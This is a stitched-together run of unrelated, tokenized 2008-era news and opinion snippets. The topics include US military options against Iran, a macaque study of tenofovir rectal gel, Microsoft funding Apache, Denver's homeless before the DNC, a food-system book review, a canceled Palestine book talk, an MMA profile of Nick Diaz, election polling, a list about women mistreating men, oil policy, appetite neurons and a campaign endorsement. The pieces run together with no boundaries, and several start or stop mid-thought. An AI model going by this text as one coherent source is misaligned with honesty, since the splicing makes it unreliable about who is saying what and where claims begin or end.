Yet many people ( many of whom did not believe that the United States could or would invade Iraq ) share an utter disbelief that the United States is in any position use military force against Iran .
After all , even if one is willing to believe that we are making progress , there are still some 140,000 U.S. soldiers deployed in Iraq  which has put a great strain on the U.S. military ( particularly the Army and Marine Corps , as well as the National Guard and reserves ) .
And things appear to be taking a turn for the worse in Afghanistan ( earlier this week a suicide bomber killed 41 people in an attack on the Indian embassy ) .
So if our hands our tied in Iraq and Afghanistan , how could we possibly do anything in Iran ?
To begin , it is important to remember that advocates for military action against Iran  both inside and outside of the administration  do not necessarily adhere to the same logic and reality that the rest of us do .
As Ron Suskind wrote in an October 2004 New York Times Magazine article :
" The aide said that guys like me were ‘ in what we call the reality - based community , ’ which he defined as people who ‘ believe that solutions emerge from your judicious study of discernible reality . ’
I nodded and murmured something about enlightenment principles and empiricism .
He cut me off .
‘ That ’s not the way the world really works anymore , ’ he continued .
‘ We ’re an empire now , and when we act , we create our own reality .
And while you ’re studying that reality  judiciously , as you will  we ’ll act again , creating other new realities , which you can study too , and that ’s how things will sort out .
We ’re history ’s actors and you , all of you , will be left to just study what we do . ’ "
Moreover , military action does not necessarily mean a ground invasion .
If the primary target is Iran ’s nuclear program , then the U.S. Air Force and Navy ( both not strained by the deployments in Iraq and Afghanistan ) could conduct air strikes .
The number of targets and requisite aimpoints to destroy those targets ranges from a very few ( perhaps just the uranium enrichment facility at Natanz which is key to the Iranians ability to produce highly enriched uranium that could be used in nuclear weapon ) to  according to retired Air Force Col .
Sam Gardiner  as many as 24 nuclear - related facilities consisting of 400 aimpoints .
But whether the number is small or large , it is well within the capability of the U.S. Air Force and Navy that orchestrated the complex air strikes for Operation Iraqi Freedom .
And while the target of air strikes might be Iran ’s nuclear program , the nuclear issue is not the only rationale for taking action .
The administration has taken almost every opportunity to link Iran to the violence in Iraq .
More importantly , Iran has been blamed for the deaths of U.S. troops in Iraq  largely by claims that the Iranians are responsible for supplying parts and expertise to build improvised explosive devices ( IEDs ) used in roadside bombings that have killed American soldiers .
( According to Gardiner , the Bush administration believes in seven key truths in making its case against Iran : Iran is developing weapons of mass destruction , Iran is ignoring the international community , Iran supports Hezbollah and terrorism , Iran is increasingly inserting itself in Iraq and beginning to be involved in Afghanistan , the people of Iran want a regime change , sanctions are not going to work , and you cannot negotiate with these people . )
Finally , there is the Israeli " wild card " to consider .
According to Shaul Mofaz , a former Israeli defense minister who is now a deputy prime minister , " If Iran continues with its program for developing nuclear weapons , we will attack . "
Mofaz ’s comments were made shortly after an Israeli military exercise that had all the makings of a rehearsal for bombing Iran ’s nuclear facilities .
Gardiner believes otherwise : " The signal I received is that Israel does NOT have the capability to effectively attack Iran ’s nuclear facilities . "
Even if Gardiner ’s military assessment is correct , it is important to understand that the Israeli government ’s worldview is different .
Iran  particularly a nuclear - capable Iran  is seen as a mortal threat to Israel ( which is only reinforced by Iranian President Mahmoud Ahmadinejad ’s inflammatory rhetoric ) .
Survival of the Jewish state may trump all other considerations  including skyrocketing the price of oil past $ 200 a barrel .
And in a classic case of the tail wagging the dog , Israeli insistence on taking military action against Iran could cause the United States to do its bidding  particularly if Gardiner ’s assessment of Israel ’s military capabilities is correct .
So with less than four months to go until the presidential election , an October surprise is still very much within the realm of possibility .
When applied as part of a rectal gel , the drug tenofovir may prevent HIV transmission , according to an study performed in macaque monkeys .
These results were released on August 4 , 2008 in the open access journal PLoS Medicine .
In both heterosexuals and homosexuals , rectal intercourse carries a very risk of HIV transmission .
Prophylactic measures thus far have focused on condoms and other physical barriers , so there is limited information about the potential use of topical products for this type of transmission .
To investigate this potential new preventative measure , Martin Cranage of St. George ’ss University of London and colleagues performed a study in macaque monkeys .
After application of the experimental gel , a placebo , or no medication , human rectal exposure to HIV was simulated in the monkeys by exposure to Simian immunodeficiency virus ( SIV ) , a form of the disease that is specific to monkeys .
The researchers found that the macaques pre-treated with rectal tenofovir gel up to two hours before viral exposure were partly or totally protexted from SIV infection .
Untreated animals , along with those treated with the placebo were infected with the virus .
Notably , some of the macaques given protection also developed T - cell immune responses to the virus .
These findings indicate that prevention of rectal HIV transmission might be achieved through topical treatment with antiretroviral drugs , a powerful new tool for HIV prophylaxis .
However , investigating this will provide further challenges for scientists , because true efficacy cannot be concluded in animals alone .
Further , recent human trials have had some setbacks — this is shown in a study of women using microbicide vaginally who actually showed increased rates of HIV infection .
Also , because of HIV ’s mechanism of attack via activated T - cells from the immune system , it is important to establish that the noted immune response does not increase subsequent infection with the virus .
The authors conclude , optimistic despite these limitations , that there is potential for topical applications of antiretroviral drugs .
“ There may be potential for synergy between topical ARV / microbicide use and vaccination as a two - pronged strategy for preventing infection with HIV , ” they say .
Florian Hladik and Charlene Dezzutti , contributed an accompanying Perspective noting the implications of this study on further studies of a similar nature , including continued refinement of the animal models , significant further pre-clinical research , and molecular level investigation .
About PLoS Medicine
PLoS Medicine is an open access , freely available international medical journal .
It publishes original research that enhances our understanding of human health and disease , together with commentary and analysis of important global health issues .
For more information , visit http://www.plosmedicine.org/
About the Public Library of Science
The Public Library of Science ( PLoS ) is a non-profit organization of scientists and physicians committed to making the world ’s scientific and medical literature a freely available public resource .
For more information , http://www.plos.org/
Prevention of SIV rectal transmission and priming of T cell responses in macaques after local preexposure application of tenofovir gel .
Cranage M , Sharpe S , Herrera C , Cope A , Dennis M , et al .
PLoS Med 5 ( 8 ) : e157 .
doi:10.1371/journal.pmed.0050157
Click Here For Full Length Article
Can a topical microbicide prevent rectal HIV transmission ?
Hladik F , Dezzutti CS
PLoS Med 5 ( 8 ) : e167 .
doi:10.1371/journal.pmed.0050167
Click Here For Full Length Perspective
Written by Anna Sophia McKenney
He said : " We have had problems dating the bones , but instead of people saying how unfortunate it is that the science can't be of more help to us , the politicians are saying ' this is a waste of time ' .
The fact that we 're trying to bring people to justice for awful abuse is ignored and it's just a constant day by day attack on the inquiry and on the victims . "
Like Steve Ballmer explicitly said a year ago , they want all open source on top of Microsoft Windows
A very mixed announcement ( positive plus negative ) has just left many people baffled , but a discussion about this has already begun in the comments ( we saw coming half a year ago ) .
Some observers may think that Microsoft has suddenly become charity investing in its competitors .
Well , Microsoft is a business — one with a history of ruthlessness and unimaginable levels of deception , one might add .
“ Microsoft had gamed Netcraft figures using an agreement with GoDaddy ( for parked domains ) .
” Why do people think that Microsoft paid Apache ?
What did people write about Apache 's visit to Redmond ( it ’s the first phase of a pattern that includes XenSource and Patrick Durusau ) ?
It was intended to optimise the software for Windows , at GNU / Linux ’ expense .
They have already done the same thing with Zend , for PHP which is another important ingredient of the LAMP stack ( Sun did this too with MySQL , but it ’s a lot less Linux - hostile ) .
Here is a very superficial and shallow coverage ( merely observation or parroting ) :
Microsoft on Friday expanded its support for the open - source community by giving money to the Apache Software Foundation , the first time it has given money to the long - standing open - source project .
What ’s the condition ?
What are the terms ?
The only insightful coverage of this came from Bruce Perens .
He previously saw how Microsoft had gamed Netcraft figures using an agreement with GoDaddy ( for parked domains ) .
It was an anti-Apache move and conversations suggest that it was not an isolated incident .
Here is Perens ’ interpretation of this latest deal .
It all sounds good .
But Apache is no threat to Microsoft , their projects run on Microsoft systems and their license does n’t prevent “ embrace and enhance ” .
Linux , GNU , OpenOffice , those are more of a threat .
This is , obviously , a strategic move by Microsoft .
I ’m trying to convince myself that we did n’t “ get owned ” .
Groklaw has some short coverage as well .
And Sam Ramji has announced also that Microsoft has become a sponsor of the Apache Foundation .
And they took the money .
There will surely be a lot more analysis of this shortly .
Watch the sellouts trail : XenSource , Zend , Novell , Sourceforge , Linspire , Xandros , Samsung , Turbolinux …
Novell , for instance , was paid a lot of money by Microsoft to turn Linux into Microsoft ’s slave in the datacentre ( VM host versus guest ) .
It was also paid a lot of money to support OOXML and ram it up some FOSS projects .
Apache was similarly victimised [ 1 , 2 ] at the 90 th minute .
Microsoft paid Apache for bragging rights .
The convicted monopolist tries to buy its competition , or at least buy out parts of it to fight the very core of its competitors , rinsing off the GNU GPL . █
“ The Internet ?
We are not interested in it . ”
– Bill Gates , 1993
“ I once preached peaceful coexistence with Windows .
You may laugh at my expense — I deserve it . ”
– Be’s CEO Jean - Louis Gassée
Share in other sites / networks :
These icons link to social bookmarking sites where readers can share and discover new web pages .
Permalink Send this to a friend
Last month
The Ticket wrote that officials in Denver , worried about the impression that 50,000 visitors to the Democratic National Convention would get next week , were planning to hide the estimated 4,000 homeless people who hang around the city 's downtown area .
They arranged for free movie passes and bingo games to get them off the street , as well as temporary housing and free tickets to the zoo and Museum of Nature and Science .
Now , with a Hat Tip to our pal Jeralyn over at TalkLeft , comes word , as Sen.
Barack Obama prepares to announce his vice presidential running mate pick , that Denver is even spiffing up the coiffures of its homeless .
They 're giving free haircuts to the homeless this week in preparation for the visiting crowds who'll arrive this weekend .
No , really .
According to Rick Sallinger of the CBS TV station , Denver Human Services has been handing out coupons for free homeless haircuts .
The idea was to make the homeless feel better about themselves .
And maybe then they 'd get jobs or something .
Rusty Johnson told Rick he had n't had a haircut in three or four months and , frankly , did n't much care about the Democrats caring about his appearance .
" I just want to look good and feel good for myself , " he said .
-- Andrew Malcolm
Photo credit : Denver Cityscape
Review by Leo Zeilig
Stuffed and Starved , by Raj Patel , Black Inc. , 2007
At the end of the 19th century huge areas of the globe where violently incorporated into the world market .
Whole regions that had for generations been farmed for local consumption were transformed for the production of cash crops .
In captured and occupied lands new food crops were introduced that had little or no local nutritional use : ground nuts ( peanuts ) in what is now Senegal and Nigeria , cocoa in Cote d’Ivoire , cotton and rubber production across thousands of square kilometres of Central Africa .
This huge first wave of marketisation swept the world , pulling down the puny defences of local economies .
When adverse weather patterns hit the areas of the world restructured by the world market in the last decades of the 19th century , two things tended to happen : cash crops failed leaving peasant farmers unable to afford the prices of existing stocks of grain , corn or rice .
Mike Davis has explained how , ``Millions died , not outside the `modern world system ’ but in the very process of being dynamically conscripted into its economic and political structures .
They died in the golden age of Liberal Capitalism ’’ ( Late Victorian Holocaust , London , Verso 2001 p.9 ) .
The ‘ new ’ globalisation
Stuffed and Starved is the story of the second devastating wave of globalisation of the world food system .
The stranglehold exercised by the giants of the corporate food system determine who eats ( and what they eat ) and who starves .
Lots of people starve -- 800 million people go hungry everyday , and they live in the global North and South .
So in the US , the world ’s richest country , 35.1 million go hungry .
Most of Raj Patel ’s story takes place from the late 1960s .
The tool that was used to carve out the control of global food supply was debt .
As the prices of oil rose in the early 1970s , countries in the global South needed credit to pay for increasingly expensive oil imports .
With interest rates at record lows credit was cheap .
Developing countries took out loans that were willingly lent , often by the banks that oil exporters had invested in .
This became known as the era of the petrodollar .
But later in the 1970s the world plunged into recession , commodity prices collapsed wiping out the major sources of foreign earnings for many governments of the global South .
Still locked into economic dependency , most African economies relied on the export of one or two primary products .
By the mid-1970s , for example , two - thirds of exports from Ghana and Chad were coffee and cotton respectively , while the fall in copper prices meant that by 1977 Zambia , which depended on copper for half of its GDP , received no income from its most important resource .
Regions already marginal to international capitalism were further marginalised .
Massive areas of the world were thrown into bankruptcy .
Crisis for the economies of the global South was an opportunity for new actors on the world stage .
International financial institutions ( IFIs ) were developed to control and regulate the economies of the South .
The most important of these institutions had been founded at the end of the Second World War .
The World Bank was reshaped , issuing loans from the early 1980s to Southern governments when few others would .
But now these loans came with strict conditions being met , and developed into ``structural adjustment programs ’’ ( SAPs ) .
So now loans were granted by the World Bank to repay interest on debts accumulated in the 1970s .
The ``conditionalities ’’ of SAPs insisted on greater inclusion of national economies into the global market , tariffs protecting local industries where removed , labour protection scrapped and agricultural subsidies removed .
All this in the name of the free market .
Now , in theory at least , these countries could be reorganised to export crops and minerals at even greater rates to earn US dollars to repay old loans .
As Patel writes , ``And one of the ways of applying their resources to the problem was through exporting agricultural goods …
And the Global North managed to replace the old colonial instruments of command and control with newer , and cheaper , mechanisms of ‘ self - imposed ’ market discipline . ’’
In little more than a decade a new food system had been built .
The instruments of global food management that had been held together since 1945 by the General Agreement on Tariffs and Trade ( GATT ) no longer had cohesive power .
A series of negotiations were launched with GATT members in 1984 and these launched what became known as the Uruguay round of talks .
In 1995 the World Trade Organisation was founded absorbing the remit of GATT , but also , crucially , a number of new domains – intellectual property , services , textiles and included a mechanism for dispute resolution that GATT had been missing .
New agreements were equally unfair , so agricultural supports continued in the form of subsidies in the developed world , while the global South was compelled to hand over these rights .
Famine and malnutrition
The cost of these policies was carried by the poor .
Areas of the world which were already exposed to the fluctuations of global commodity prices were hit particularly hard .
Chronic malnutrition became a stable feature of Africa .
In 1991 in Zambia , in Southern Africa , chronic malnutrition ( stunting ) between the ages of six and fifty - nine months was 39 per cent , while in 2000 the United Nations Development Program reported that in the Southern African region 20 per cent of children under five were underweight .
Economic devastation in the 1990s left Africans consuming 25 per cent less then they had in the 1960s and spending less on education and social services than at any time since independence .
Hunger is hardwired into the system of debt and structural adjustment .
Patel gives many examples .
Take Malawi in 2001 .
Here the International Monetary Fund insisted that the government cut its grain reserves from 165,000 to 30,000 metric tons – based on the logic of cost cutting .
As Malawians started to die of starvation the IMF refused to disburse US $ 47 million in loans to the government due to accusations of impropriety in the handling of the famine .
Better people die than the market be bucked .
Mass malnutrition and famine have been the direct corollary of the reshaped global food industry .
Ownership
Patel ’s book also takes us into the boardrooms of those transnational agricultural corporations that have helped power the transformation of the food industry .
These corporations have seen their share of world food trade grow massively under the new rules .
Patel reports that ``agricultural corporations control 40 per cent of world trade in food , with twenty companies controlling the world coffee trade , six controlling 70 per cent of wheat trade , and one controlling 98 per cent of packaged tea ’ ’ .
Much of this concentration is a relatively recent phenomenon that has led directly to higher prices for consumers .
Though the giants of agribusiness compete against one another they are happy to join other players in the food game – up and down the distribution , pesticide and processing chain .
So food giant Cargill has partnered with Monsanto , sharing its logistical and processing expertise with an organisation that specialises in pesticides and seeds .
Resistance
Stuffed and Starved would be a gloomy read if there was n’t another side to the story .
While Patel tells of the despair that the refigured food system has wrought on peasant farmers and rural communities around the world – suicide rates , for example , in one area of rural southern India was 58 per 100,000 for men and 148 per 100,000 for women – he also speaks of resistance .
The greatest of these struggles has been organised by the Brazilian Landless Rural Workers Movement ( MST ) .
Over the last thirty years Brazil has seen the massive expropriation of land as a result of the restructuring of global food production .
Militants in the MST have reoccupied land , farmed it , set up ``settlements ’’ and brought legal action against state governments and multinationals , becoming what Noam Chomsky has labelled ``the world ’s most important social movement ’’ .
Out of this resistance , some of the landless have transformed themselves and established democratic forms of self - rule .
The post - sub - prime bubble
Since Patel ’s book was published the changes he describes have accelerated .
The UN recently reported that 121 countries have ``crisis - level hunger ’’ that has come from the rapid increase in food prices .
The media explains that these prices rises are caused by the expansion of biofuels and the finite supply of oil – this is , largely , nonsense .
Huge amounts of capital , measured in the tens of trillions , have been moved by speculators and investors from the sub - prime cash - cow that recently imploded to other commodities , principally food and oil .
This has had the effect of driving up prices .
This money has been invested in futures / derivatives contracts , in Chicago , New York and London , where wheat , rice , corn and cooking - oil prices are set every day .
Many of those involved are familiar to us .
To avoid regulation stockmarket investor Warren Buffett ( listed as the world ’s richest man ) , Bill Gates and Richard Branson have brought huge chunks of the global food industry – often from food giants such as Cargill and ADM .
Though there is competition between the billionaires investing in food , there is , crucially , collaboration that furthers their combined interests .
Stuffed and Starved helps to explain how we have arrived here .
Resisting the market
What can we do ?
To the huge profits of the multinationals and the global food crisis Patel refuses to advocate simply consumer activism , it is not enough to be``label vigilantes ’’ , he writes .
The challenges posed by the transnational corporate control of the food industry are too great .
Rather Patel points to other alternatives .
The book describes several important local initiatives that directly confront the power of the food industry .
The MST is one , but another is the People ’s Grocery in West Oakland , San Francisco .
Directly inspired by the community activism of the Black Panthers in the 1960s , the People ’s Grocery seeks to provide cheap , locally produced fruit and vegetables that pulls in community gardens and a grassroots support base .
Other initiatives include community supported agriculture ( CSA ) that involves weekly deliveries of organic and seasonal food from producers to consumers across the United States .
These projects , though unstable in the context of the overwhelming domination of big corporate supermarket chains , have expanded in recent years .
The book concludes with a list of individual and global actions to combat the power of the food industry , as Raj says correctly : ``Some will require international cooperation for change .
Some will be up to us as individuals . ’’
Both are difficult .
But the solution is not simply buying ``fair trade ’’ products , though they are better than the alternatives for giving farmers more a ``margin of dignity and income from a food system that holds them in contempt ’’ .
Patel argues that initiatives like fair trade are a fragile band - aid on an intolerable system .
Rather he looks to move beyond the ``honey trap ’’ of ethical consumerism that sees solutions only through the consumption power of , mostly , Northern shoppers through the market .
Snapping the market
In place of these answers Stuffed and Starved offers far more radical solutions .
For example ``worker - owned cooperatives ’’ that promise economic democracy but will only be achievable after prolonged struggles by trade unionists and farmworkers in the North and South .
These changes must be combined with what Patel describes as ``profound and comprehensive rural change ’’ and a ``living wage for all ’’ .
These political and economic struggles re linked , so the Southern poor will see their fight for land and dignity as identical to those struggling to take back control of their lives , and shape the food system , in the North .
This , Patel tells us , can only happen when the power of agribusinesses is ``snapped ’’ .
Practical solutions to the food crisis must combine local initiatives to re-establish control over our food , and a political and economic program for the total control of food production .
This was the original project of the Black Panthers , their community action only made sense and was sustained to a large extent by an understanding of the need for control of food production as part of the transformation of society – the socialisation of all production and the suppression of the market .
Patel ’s book already hints at the risks of attempting to transform only a corner of our globe , while the rest remains under the dominion of the market .
The MST settlements find it is ``easier to continue and reproduce themselves when the call of the cities is faint ’’ .
The best settlements have been those further away from towns and cities , but ``it is not possible … to seal off a community from influences of the modern world ’’ .
The market encroaches , but not by some invisible logic .
When these alternatives become too challenging , governments , armies and multinational corporations will attempt to break them .
Practical solutions insist on a bigger politics .
Sustaining the local campaigns , settlements and incremental projects that Stuffed and Starved rightly celebrates demands a political alternative that sees the suppression of the market mechanism in food production .
But who will be the agents of this transformation ?
Part of the political answer lies in the extraordinary protests that have broken out around the world in response to increases in food prices and basic commodities .
These have often , patronisingly , been called ``food riots ’’ but are frequently well organised protests , bringing in an array of organisations and including strike movements that have challenged governments .
These movements have the potential to reverse the control of the food system by the market ’s billionaires , transnationals and governments .
Stuffed and Starved will be a vital part of learning how the world food system works and how it can be beaten .
I was scheduled to speak at Politics & Prose Bookstore and Coffeehouse last month about my latest book , “ Palestine Inside Out : An Everyday Occupation . ”
My appearance was canceled when the bookstore owners realized that my book concludes by questioning the viability of a two - state solution to the Israeli - Palestinian conflict .
Instead it proposes a single democratic , secular and multicultural state in which Israelis and Palestinians live peacefully as citizens with equal rights .
“ I do not believe that your book will further constructive debate in the United States , ” one of the owners wrote to me in an e-mail .
“ A single state is not a solution . ”
I was dismayed that my invitation was rescinded because I express a different point of view from the one sanctioned by a supposedly independent bookstore .
Yet the cancellation seems to fit into a larger pattern of nationwide censorship about this issue .
Stanford professor Joel Beinin had been invited to speak about Israel and Palestine at a Silicon Valley school last year ; his appearance was canceled when the school was criticized for booking the event .
Tony Judt of New York University was invited to speak about Israel and Palestine at the Polish Consulate in New York last fall ; his talk was canceled after the consulate came under pressure from the Anti-Defamation League and the American Jewish Committee .
The fact that senior scholars are prevented from speaking in well - known forums because they do not toe an official line suggests that the civic culture on which our country was founded has broken down , at least when it comes to Palestine and Israel .
Yet citizens can object to the muzzling of ideas .
After receiving letters of protest and eloquent entreaties by bloggers , Politics and Prose decided last week to reissue my invitation .
This reversal is an important step forward but questions still linger .
Can we afford not to hear each other out as we evaluate our Middle East policies ?
Should Palestinians not be allowed to speak unless their erstwhile audience gets to tell them what to say ?
What , then , is the point of a conversation ?
What is the alternative to conversation ?
What is so unspeakably wrong with saying that justice , secularism , tolerance and equality of citizens — rather than privileges granted on the basis of religion — should be among the values of a state ?
— Saree Makdisi
Los Angeles
The writer is a professor of English literature at UCLA .
( )
( )
( )
( )
( )
( )
( )
PLEASANT HILL , Calif . --
" One more , Cesar , please , " Nick Diaz says softly from a kneeling position inside the ring at Cesar Gracie 's gym .
The lanky , gritty fighter has already done what was asked of him .
But he just wants one more round .
A handful of minutes can seem like an eternity against Gilbert Melendez , yet Diaz wants the extra time with his training partner in another full - throttle , all - encompassing sparring session .
Wearing MMA gloves , the two were tearing at each other moments ago .
They only went soft -- for fighters that is -- when striking to the head .
Now they 're replenishing , ready to go home and sitting in lightweight chairs across the gym .
Cesar Gracie swings his corvette yellow timer at his side as he walks past fighters sprawled on the grappling mat .
The stopwatch moves in big , tight circles , mimicking the rhythm of a cop twirling a baton .
" One more ? " he asks , stepping into earshot .
The fighters -- two of his top students in one of the sport 's most highly regarded camps -- nod and vocalize agreement behind fading breaths .
Gracie had frequently turned his back during their sparring .
They know what to do .
This time , however , he sits on the edge of a homey leather couch on the other side of the facility .
He has a perfect view of the ring , of Diaz stuffing Melendez 's takedowns and Melendez persisting at the pace of a bullet , but Gracie misses most of the final round due to breezy conversation floating around the hard work .
Wooden planks rumble under the ring .
Gracie looks up .
Diaz bounces against the mat .
Perhaps Melendez elevated him too high , but it 's part of the process .
It 's training .
It 's where the real work occurs .
The UFC veteran immediately works off his back and soon rolls out , back to his feet .
He stalks forward , shoots and ends up halfway behind Melendez before dragging him down like he was breaking the law .
Back and forth , they bring out the best in each other as their trainer glances down at his timer , slowly works his way to his feet and starts toward the ring .
" Time , " Gracie says to no one in particular .
Diaz and Melendez turn off their adrenaline immediately , stopping mid-stride .
Judging by Gracie 's cargo shorts and relaxed demeanor , it would be difficult to peg him as the top - flight instructor he is daily .
He seems more ready for the beach than he does for a fight night .
However , it 's clear when he shifts from instructing gi jiu - jitsu to MMA to weight cutting merely by taking a few steps , he is completely tuned in .
He is the man who inspires the work ethic of a tireless athlete like Diaz .
Finding Brazilian jiu - jitsu in his teen years , Diaz became a staple of the fight camp that is tucked away between lively trees and eerily silent shops .
Now a black belt , he is known as much for his resilience in MMA as he is for his vocal , diehard attitude outside of combat .
But as he peels off his shirt and rests against the padded blue wall next to Gracie , Diaz is as subdued as they come .
He is quiet while Melendez shoots smiles and jokes across the gym , contemplating Kanye West 's favorable fashion choices .
Diaz begins talking technique with his mentor , who waves me over to speak to the 23 - fight veteran .
Before I can introduce myself , Diaz asks if I saw the slam .
No need to specify ; I tell him I did .
He is eyeing his knees and implores me to assess his performance .
I offer my take :
He sprawled well and had more kicks and knees , never finding himself in truly bad spots , but " El Nino " had hands and takedowns to spare .
The 24 - year - old engages more , speaking up and establishing eye contact as he analyzes the round .
I have nothing more to add .
He falls silent , reluctantly realizing his training is done for the day -- although he might join his brother Nate Diaz boxing later in the night -- and it is time to speak to the media .
The 160 - pound division feels right for him , Diaz says in a faint tone .
He has a size advantage and is feeling more explosive these days .
It takes coaxing for Diaz to speak about subjects that have made him a controversial figure .
K.J. Noons won their November title bout on a cut that should n't have ended the fight and has denied him a rematch , Diaz says .
His scar tissue surgery had nothing to do with that fight -- it was scheduled before .
He 'd fight Yves Edwards , who is scheduled to challenge Noons , if he was the champion , but he'd rather not because he knows him .
He does n't like fighting people he knows .
Subjects like Sean Sherk and Karo Parisyan , he 's said it before , " What am I going to do ?
" The native of Stockton , Calif. , attributes his four decision losses in the UFC to inexperience .
Three of the four defeats were ruled unanimous decisions -- a fact that bothers him .
" I would n't have complained if they were splits , " he says .
" They were good fights .
In some ways I could have won .
In some ways they could have won .
I guess it was just who was watching and who you wanted to win pretty much , you know what I mean ? "
More in - tune ?
Voters Lean Obama
With John McCain and Barack Obama trading barbs about who is the more out - of - touch ( real estate - wise ) , in two new national polls , the law professor turned senator appears to have the edge on the Navy pilot turned senator .
In the CBS News - New York Times poll released last night , 55 percent of voters said Obama is someone they can " relate " to , while 41 percent said so of McCain .
Among independents , however , the two run about evenly : 46 percent said they can relate to the senator from Illinois , 44 percent said so about McCain .
Obama fares better on the question among Republicans ( 28 percent ) than McCain does among Democrats ( 14 percent ) .
Is ... someone you can relate to , or not ?
Barack Obama John McCain
That poll also showed Obama with an advantage as the more empathetic candidate .
Nearly four in 10 said Obama cares " a lot " about their needs and problems , just about a quarter said so of McCain .
But Obama too faces challenges on related questions .
In the new NBC News - Wall Street Journal survey , 60 percent said McCain has a " background and set of values that you can identify with , " 50 percent said so of Obama .
And in the CBS - Times poll , while the two ran evenly on sharing " the values most Americans try to live by , " McCain had a slim edge on this question among independents , 65 percent of whom said he shared such values ; 59 percent who said so of Obama .
Some would argue , " No , no .
This never happens . "
Obviously , they 're not living in the real world .
Just like how women can be treated badly , men can also be treated badly .
And for some reason , men are socially engineered to take more crap from the woman .
Here are some of the things women who treat men badly do :
1. " Disapprove " of him and his likes in attempt to change the man .
2 . Keep reminding him that she wants to break - up with him on a specific set date .
3 . Taking for granted , his ability to understand and compromise .
4 . Taking advantage of his generosity .
In this case , she starts becoming a gold - digger .
5 . Getting her way whenever there is a conflict .
Some would argue the man may be passive at this point .
But usually , the only thing he wants to avoid is a meaningless argument .
6 . Flirting with other men either in front of him or behind his back .
7. Cheating on him .
8 . Not understanding that his personality can grow to become more enlightened .
9 . Having sex only when she wants .
10 .
Not respecting his private / personal life .
11 . Arguing over every meaningless detail of either " what he said " or " what he did " .
12 . Having little tolerance and patience of his own " flaws " .
13 .
Not saying " sorry " when she 's wrong .
14 . Not admitting when she 's wrong and always trying to get him to admit he 's wrong when he really is n't .
15 . Blaming him for everything or anything that goes wrong .
16 . Not going to important events with him .
( e.g. his graduation , lifetime achievement award ceremony , their wedding , etc ... )
17 .
Not sacrificing nor compromising anything of hers for his benefit .
( Are n't relationships suppose to be a two - way street ? )
18 . Telling him " I do n't love you , " yet still wanting to have sex with him .
It is a good thing that not all women are like this .
Hell , if they were , I 'm sure there would be battles raging on .
For all the nice girls out there , keep being nice and the man of your dreams may come to you .
... and here 's a continuation of the list fromour break - up
19 .
Leaving the relationship , the apartment , the life you were suppose to have with her without a word from her except a measely 2 - cent note .
20 .
Leaving with you the bills and the rent to pay after she 'd gone .
21 . Not telling you the reasons she left until at least a month passes by , and then seeing it posted on a public website instead of discussing it face to face .
Now , imports supply nearly two - thirds of our daily needs , according to the United States Energy Information Administration .
Most of this oil comes from countries that are either unstable ( Nigeria ) or whose leaders or people dislike us ( Venezuela , Saudi Arabia ) .
Even in Canada , long our best friend on earth , and an immense oil supplier to us , there is an active movement of environmentalists who believe it best not to develop Canada ’s vast oil sands and send the oil to us .
That movement has recently had some frightening success .
What are we going to do ?
If there were another oil embargo , we would be in real trouble .
If Mexico fell into chaos , if Venezuela stopped sending us oil , there would be extreme hardship .
Beyond that , what if we are close to peak oil  that point at which we have pumped out more than half the oil on the planet ?
What if supply slips and demand continues to skyrocket , as they are already doing , and these trends continue indefinitely ?
What if the world has a bitter fight over its remaining oil ?
Even if this battle is fought with money and not guns , we are at a disadvantage with our pitiful currency and our budget and trade deficits .
In my humble view , we are now in a short - term oil bubble .
It will pass and correct , as bubbles do .
And speculators will make millions , whichever way it goes .
But the long run is terrifying .
If we are at or past peak oil , if oil states stop or even hesitate to send us the juice , if Canada decides not to fill our needs , we are in overwhelming trouble .
So , what to do ?
First , we do not kill the geese  the big oil companies  that lay the golden eggs .
We encourage them and cheer them on to get more oil .
They need incentives , not hammer blows .
BUT most of all , we treat this as a true crisis .
As my pal Glenn Beck , the conservative commentator , says , we need a new moon - shot mentality here .
We need to turn coal into oil into gasoline , to use nuclear power wherever we can , and to brush aside the concerns of the beautiful people who live on coastal pastures ( like me ) .
And we need to drill on the continental shelf , even near where movie stars live .
This must be done , on an emergency basis .
If we keep acting as if the landscape were more important than human life , we will make ourselves the serfs of the oil producers and eventually reduce our country to poverty and anarchy .
In that long message sent to Congress 35 years ago , there was an outline of what we needed to do on coal - to - oil and shale - to - oil , as well as wind , solar and wave power .
For a generation plus , we have done next to nothing .
The hour is late .
The clock of destiny is ticking out , as the Rev. Dr. Martin Luther King Jr. said .
Let ’s roll .
We ’re all saddened that we could n’t build our beloved city in the desert this August .
But we ’re resolved : returning to Black Rock City is our number one priority ; it ’s our ... Read More
A Monash University scientist has discovered key appetite control cells in the human brain degenerate over time , causing increased hunger and potentially weight - gain as we grow older .
The research by Dr Zane Andrews , a neuroendocrinologist with Monash University 's Department of Physiology , has been published in Nature .
Dr Andrews found that appetite - suppressing cells are attacked by free radicals after eating and said the degeneration is more significant following meals rich in carbohydrates and sugars .
" The more carbs and sugars you eat , the more your appetite - control cells are damaged , and potentially you consume more , " Dr Andrews said .
Dr Andrews said the attack on appetite suppressing cells creates a cellular imbalance between our need to eat and the message to the brain to stop eating .
" People in the age group of 25 to 50 are most at risk .
The neurons that tell people in the crucial age range not to over - eat are being killed - off .
" When the stomach is empty , it triggers the ghrelin hormone that notifies the brain that we are hungry .
When we are full , a set of neurons known as POMC 's kick in .
" However , free radicals created naturally in the body attack the POMC neurons .
This process causes the neurons to degenerate overtime , affecting our judgement as to when our hunger is satisfied , " Dr Andrews said .
The free radicals also try to attack the hunger neurons , but these are protected by the uncoupling protein 2 ( UCP2 ) .
Dr Andrews said the reduction in the appetite - suppressing cells could be one explanation for the complex condition of adult - onset obesity .
" A diet rich in carbohydrate and sugar that has become more and more prevalent in modern societies over the last 20 - 30 years has placed so much strain on our bodies that it 's leading to premature cell deterioration , " Dr Andrews said .
Dr Andrews ' next research project will focus on finding if a diet rich in carbohydrates and sugars has other impacts on the brain , such as the increased incidences of neurological conditions like Parkinson 's disease .
Also receives endorsement of Republican Minority Leader in the Maryland House of Delegates
CALLAWAY , Md. ( July 22 , 2008 ) — Collins Bailey , the Republican candidate for Maryland 's 5th congressional district has received an endorsement from ten-term Texas Congressman and GOP presidential candidate Ron Paul .
Bailey will try to unseat long - time incumbent Democrat Steny Hoyer this November in the 2008 Presidential election .
Bailey 's campaign noted that Hoyer entered politics when Bailey was just 7 years - old .
The Paul endorsement reads : " Collins Bailey is a man of dignity who stays true to our principles .
He has the utmost respect for the rule of law and our Constitution .
As a believer in a constitutionally limited federal government , sound monetary policies , civil liberties , and a common sense foreign policy , Collins understands what the real issues are and how they are affecting our country .
He has served as an elected member of the Charles County Board of Education .
He is currently serving his fourth consecutive four - year term ....
Our country needs Collins in Washington .
